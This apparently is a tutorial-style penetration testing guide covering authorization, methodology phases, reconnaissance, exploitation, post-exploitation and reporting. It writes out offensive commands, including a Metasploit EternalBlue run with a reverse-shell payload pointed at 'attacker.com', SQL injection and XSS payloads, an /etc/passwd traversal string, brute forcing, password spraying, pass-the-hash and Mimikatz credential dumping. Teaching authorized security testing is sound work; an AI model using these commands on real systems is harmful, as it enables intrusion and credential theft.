Complete Penetration Testing Guide 2024: Methodology, Tools & Reporting

Key Takeaways

Always have written authorization before testing.
Follow a structured methodology (recon → scan → exploit → report).
Document everything for comprehensive reporting.

The goal is to improve security, not just find vulnerabilities.
Post-exploitation demonstrates real business impact.
Professional reports include prioritized remediation steps.

1. What is Penetration Testing?
2. Types of Penetration Tests
3. Pentest Methodology
4. Reconnaissance Phase

5. Exploitation
6. Post-Exploitation
7. Reporting
8. Frequently Asked Questions

1. What is Penetration Testing?

Penetration testing (pentesting) is an authorized simulated attack on a computer system to evaluate its security. Unlike vulnerability scanning, which only identifies potential weaknesses, pentesting attempts to actually exploit vulnerabilities to demonstrate real-world impact.

The goal is to identify security gaps before malicious actors do, providing organizations with actionable insights to improve their security posture. Professional pentesters think like attackers but work ethically to help defenders.

Authorization is Mandatory

Penetration testing without explicit written authorization is illegal. Always obtain a signed Rules of Engagement document defining scope, timing, and boundaries before any testing. Testing third-party infrastructure requires their permission too.

2. Types of Penetration Tests

Type	Knowledge	Simulates
Black Box	No prior knowledge	External attacker
White Box	Full knowledge (code, architecture)	Insider or comprehensive audit
Gray Box	Partial knowledge	Authenticated user, partner

2.1 Test Categories

Network Pentest: Internal/external network infrastructure
Web Application: OWASP Top 10, business logic flaws
Mobile Application: iOS/Android app security
Wireless: WiFi, Bluetooth security
Social Engineering: Phishing, physical access testing
Red Team: Full-scope adversary simulation

3. Pentest Methodology

Standard Pentest Phases

1. Pre-engagement: Scoping, authorization, rules
2. Reconnaissance: Information gathering
3. Scanning: Enumeration, vulnerability assessment
4. Exploitation: Gaining access
5. Post-exploitation: Privilege escalation, lateral movement
6. Reporting: Documentation, recommendations

4. Reconnaissance Phase

4.1 Passive Reconnaissance

# OSINT gathering (no direct interaction with target)
# WHOIS lookup
whois example.com

# DNS records
dig example.com ANY
dig +short -x $(dig +short example.com)

# Subdomain enumeration
amass enum -passive -d example.com
subfinder -d example.com

# Historical data
# Check archive.org, Certificate Transparency logs

# Employee OSINT
# LinkedIn, social media, data breaches

4.2 Active Reconnaissance

# Port scanning
nmap -sS -sV -sC -O -p- -T4 target.com

# Common Nmap options:
# -sS: SYN scan (stealth)
# -sV: Version detection
# -sC: Default scripts
# -O: OS detection
# -p-: All ports

# Web application scanning
nikto -h https://target.com
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt

# Service enumeration
enum4linux -a target.com    # SMB
smtp-user-enum -M VRFY -U users.txt -t target.com

5. Exploitation

5.1 Metasploit Framework

# Start Metasploit
msfconsole

# Search for exploits
search type:exploit platform:windows smb

# Use exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target.com
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST attacker.com
exploit

5.2 Web Application Exploitation

# SQL Injection with SQLMap
sqlmap -u "https://target.com/page?id=1" --dbs --batch

# XSS testing
# Manual: <script>alert('XSS')</script>
# Tools: XSStrike, Burp Suite

# File upload bypass
# Test: .php.jpg, .phtml, content-type manipulation

# Directory traversal
# Test: ../../etc/passwd, various encodings

5.3 Password Attacks

# Hydra for brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com ssh

# Hash cracking with Hashcat
hashcat -m 1000 -a 0 hashes.txt rockyou.txt  # NTLM
hashcat -m 1800 -a 0 hashes.txt rockyou.txt  # SHA512crypt

# Password spraying
crackmapexec smb target.com -u users.txt -p 'Summer2024!'

6. Post-Exploitation

6.1 Privilege Escalation

# Linux privilege escalation
# Check sudo permissions
sudo -l

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Kernel exploits
uname -a  # Check kernel version

# Windows privilege escalation
# Check privileges
whoami /priv

# Unquoted service paths
wmic service get name,pathname | findstr /i "Program Files"

# Automated enumeration
# Linux: LinPEAS, LinEnum
# Windows: WinPEAS, PowerUp

6.2 Lateral Movement

# Pass the Hash
crackmapexec smb targets.txt -u Administrator -H aad3b435b51404eeaad3b435b51404ee:hash

# PSExec
psexec.py domain/user:[email protected]

# Mimikatz for credential extraction
mimikatz.exe
sekurlsa::logonpasswords

6.3 Data Exfiltration (Proof)

Demonstrate impact by accessing sensitive data (with permission). Document findings without actually extracting real sensitive data. Screenshots of access are sufficient proof.

7. Reporting

7.1 Report Structure

Executive Summary: High-level findings for management
Scope: What was tested
Methodology: How testing was conducted
Findings: Detailed vulnerabilities with evidence
Risk Ratings: CVSS scores, business impact
Recommendations: Prioritized remediation steps
Appendices: Technical details, tool output

7.2 Finding Documentation

# For each finding, document:
- Title: Clear, descriptive name
- Severity: Critical/High/Medium/Low/Info
- CVSS Score: Standardized severity rating
- Affected Assets: Specific hosts/URLs
- Description: What the vulnerability is
- Evidence: Screenshots, PoC code, requests
- Impact: What could an attacker do?
- Remediation: How to fix it
- References: CVE, CWE, OWASP links

Quality Reports Matter

The report is the primary deliverable. A well-written report that helps the organization improve security is more valuable than finding many vulnerabilities with poor documentation. Focus on actionable recommendations.

8. Frequently Asked Questions

How do I get started in penetration testing?

Start with learning networking and operating systems fundamentals. Practice on legal platforms like HackTheBox, TryHackMe, and VulnHub. Build a home lab. Consider certifications like OSCP, CEH, or PNPT. Entry-level roles include SOC analyst or junior pentester.

What's the difference between pentest and vulnerability assessment?

Vulnerability assessments identify potential weaknesses using automated scanners. Penetration tests attempt to exploit vulnerabilities to prove impact. Pentests include manual testing, chaining vulnerabilities, and demonstrating what an actual attacker could achieve.

Conclusion

Penetration testing is a critical security practice that identifies real vulnerabilities before attackers do. Follow a structured methodology, document everything, and focus on providing actionable value to the organization. Always operate ethically and within authorized scope.

Continue Learning:
Bug Bounty Guide OSINT Guide